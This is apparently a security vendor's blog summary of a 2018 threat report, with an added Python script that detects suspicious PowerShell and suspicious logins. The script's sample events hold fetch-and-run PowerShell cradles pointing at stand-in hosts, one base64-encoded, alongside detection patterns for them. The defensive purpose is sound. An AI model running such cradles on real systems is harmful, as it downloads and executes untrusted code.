Welcome to the second annual Rapid7 Quarterly Threat Report wrap-up! In the last quarter of 2018, we continued to see credential theft and PowerShell usage, showing that as much as things change, some things will still stay the same. In this report, we take a closer look at our custom Attacker Behavior Analytics rules, examine some new threats we’ve seen this year (such as ADB activity), and provide some steps to help you strengthen your organization’s security posture.
Threat event overview: Credential theft and PowerShell usage
In Q4, we saw a rise in malware such as Emotet and Ursnif, caught by the malicious PowerShell they invoke on endpoints. Also, with remote entry being the No. 1 incident type for both large and small organizations, attackers have been using credentials from past breaches along with their favorite phishing lures to get users to hand over their credentials.
Deep dive into Attacker Behavior Analytics
In this Threat Report, we take a look at the past year to break down the rules that go into our ABAs to get a better sense of what exactly attackers are doing. Those rules are created by our SOC analysts, who leverage their daily experience with attackers to go beyond simple indicators of compromise and turn their knowledge into rules to detect malicious behaviors in our SIEM solution, InsightIDR. Looking over the course of the year, the No. 1 rule we saw was suspicious authentication, which goes hand in hand with all the breaches and credential theft we’ve seen this year.
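The two behaviors called out above, malicious PowerShell invoked on endpoints and suspicious authentication, are the kind of thing behavior rules look for rather than static indicators. The following is an added illustration, not Rapid7's code and not InsightIDR's actual ABA rules: two small detection rules run over constructed sample events. The field names (`host`, `parent`, `cmdline`, `user`, `src`, `ok`, `t`), the indicator list and the thresholds are all assumptions chosen for the example.

```python
"""Added example: toy behavior rules for suspicious PowerShell and suspicious
authentication, run over constructed sample events. Not Rapid7's code and not
InsightIDR's ABA rules; field names and thresholds are assumptions."""
import base64
import re
from collections import defaultdict

# Constructed -EncodedCommand payload (PowerShell expects UTF-16LE base64).
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    .encode("utf-16le")).decode()

# Constructed sample endpoint process-creation events (hypothetical field names).
PROCESS_EVENTS = [
    {"host": "ws01", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE},
    {"host": "ws02", "parent": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host": "ws03", "parent": "EXCEL.EXE",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c \"IEX (New-Object "
                "Net.WebClient).DownloadString('http://example.invalid/a')\""},
]

# Indicators scored on the command line plus the decoded encoded command, if any.
POWERSHELL_INDICATORS = [
    ("encoded_command", re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")),
    ("hidden_window", re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("no_profile", re.compile(r"(?i)-nop(rofile)?\b")),
    ("bypass_policy", re.compile(r"(?i)-ex(ecutionpolicy)?\s+bypass")),
    ("download_cradle", re.compile(
        r"(?i)(downloadstring|downloadfile|net\.webclient|invoke-webrequest)")),
    ("invoke_expression", re.compile(r"(?i)(\biex\b|invoke-expression)")),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if absent/undecodable."""
    m = re.search(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_powershell(event):
    """Return the indicator names matched by one process-creation event."""
    cmd = event["cmdline"]
    if "powershell" not in cmd.lower():
        return []
    text = cmd + " " + decode_encoded_command(cmd)   # scan the decoded payload too
    hits = [name for name, rx in POWERSHELL_INDICATORS if rx.search(text)]
    if event["parent"].lower() in OFFICE_PARENTS:    # Office spawning PowerShell
        hits.append("office_parent")
    return hits


def suspicious_powershell(events, threshold=2):
    """Flag events with at least `threshold` indicators: {host: [indicators]}."""
    return {ev["host"]: hits for ev in events
            if len(hits := score_powershell(ev)) >= threshold}


# Constructed sample authentication events; `t` is seconds, `ok` is success.
AUTH_EVENTS = [
    {"t": 100, "user": "alice", "src": "10.0.0.5", "ok": True},
    {"t": 200, "user": "bob", "src": "10.0.0.7", "ok": False},
    {"t": 205, "user": "bob", "src": "10.0.0.7", "ok": False},
    {"t": 210, "user": "bob", "src": "10.0.0.7", "ok": False},
    {"t": 215, "user": "bob", "src": "10.0.0.7", "ok": False},
    {"t": 220, "user": "bob", "src": "10.0.0.7", "ok": True},
    {"t": 300, "user": "alice", "src": "203.0.113.9", "ok": True},
]


def suspicious_auth(events, max_failures=3, window=300):
    """Two behaviors: (1) >= max_failures failures for a user within `window`
    seconds followed by a success; (2) a success from a source the user has not
    succeeded from before in this stream. Returns [(user, reason), ...]."""
    alerts = []
    failures = defaultdict(list)   # user -> timestamps of recent failures
    known_src = defaultdict(set)   # user -> sources seen logging in successfully
    for ev in sorted(events, key=lambda e: e["t"]):
        user, t = ev["user"], ev["t"]
        failures[user] = [ft for ft in failures[user] if t - ft <= window]
        if not ev["ok"]:
            failures[user].append(t)
            continue
        if len(failures[user]) >= max_failures:
            alerts.append((user, "success_after_%d_failures" % len(failures[user])))
            failures[user] = []
        if known_src[user] and ev["src"] not in known_src[user]:
            alerts.append((user, "new_source_%s" % ev["src"]))
        known_src[user].add(ev["src"])
    return alerts


if __name__ == "__main__":
    for host, hits in suspicious_powershell(PROCESS_EVENTS).items():
        print("PowerShell alert on %s: %s" % (host, ", ".join(hits)))
    for user, reason in suspicious_auth(AUTH_EVENTS):
        print("Auth alert for %s: %s" % (user, reason))
```

Two design points worth noting. The PowerShell rule decodes the `-EncodedCommand` payload and scores indicators on the decoded text as well, since an encoded download cradle is otherwise invisible to a command-line match; it also scores on the parent process, because the same command line from an Office document and from an administrator's scheduled task carry very different risk. The authentication rule only raises a "new source" alert once it has a baseline for that user, so in a real deployment the `known_src` set would be seeded from historical successful logins rather than from the first event in the stream.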
New threats for the year
One new threat we saw this year was cryptominers exploiting the open ADB ports on Android phones. This shows that attackers read the news and pay attention to the newest vulnerabilities, just like everyone else, and are extremely flexible when coming up with new ways to exploit victims.
Even though we saw this activity tapering off at the end of the year, one thing to keep in mind is that threats never really die, and this one could come back. So, the best thing to do here is to make sure all your devices are always up-to-date with all patches.
Read the 2018 Q4 Threat Report in its entirety for more information on the trends and activities we saw this past quarter and throughout the year, and take advantage of some of our recommendations to keep your network safe.